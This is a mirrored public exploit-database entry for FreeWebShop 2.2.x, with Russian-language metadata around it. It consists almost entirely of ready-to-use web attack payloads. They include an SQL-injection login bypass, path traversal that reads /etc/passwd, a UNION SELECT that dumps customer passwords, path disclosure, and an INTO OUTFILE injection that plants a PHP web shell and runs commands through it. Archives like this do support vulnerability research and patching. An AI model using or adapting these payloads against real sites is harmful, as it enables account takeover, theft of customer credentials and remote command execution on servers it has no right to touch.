- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2704
- Проверка EDB
-
- Пройдено
- Автор
- SPIKED
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6941 cve-2006-5773 cve-2006-5772
- Дата публикации
- 2006-11-02
Код:
Product: www.freewebshop.org
Version: 2.2.x, maybe lower
Critical Lvl : Highly critical
Where : From Remote
Exploits:
Bypass Login:
username:admin
password:' or 'a'='a
Read Files:
/index.php?page=info&action=../../../../../../../../../../../../etc/passwd%00
List Passwords:
/index.php?page=details&prod=1%20UNION%20SELECT%201,password,3,loginname,5,6,7,8%20FROM%20customer
Path Disclosure:
/index.php?page=info&action=../../1337inexistant
Create Files (needs Path Disclosure):
/index.php?page=details&prod=1337%20UNION%20SELECT%201,2,3,%22%3C?php%20passthru($_GET['cmd'])%20?%3E%22,5,6,7,8%20FROM%20customer%20INTO%20OUTFILE%20'[NEWPATH]/fork.php'
/langs/uk/fork.php?cmd=ls
Discovered by Spiked and anonymous.
irc.geekshangout.org #backup
# milw0rm.com [2006-11-02]- Источник
- www.exploit-db.com
